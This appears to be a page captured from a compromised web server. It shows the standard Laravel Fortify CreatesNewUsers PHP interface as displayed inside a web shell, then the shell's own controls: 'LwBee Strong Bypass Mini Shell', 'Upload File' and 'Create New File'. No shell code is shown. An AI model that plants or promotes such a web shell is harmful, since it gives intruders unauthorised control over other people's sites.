/home/aloic1/public_html/core/vendor/laravel/fortify/src/Contracts/CreatesNewUsers.php
<?php

namespace Laravel\Fortify\Contracts;

interface CreatesNewUsers
{
    /**
     * Validate and create a newly registered user.
     *
     * @param  array  $input
     * @return mixed
     */
    public function create(array $input);
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File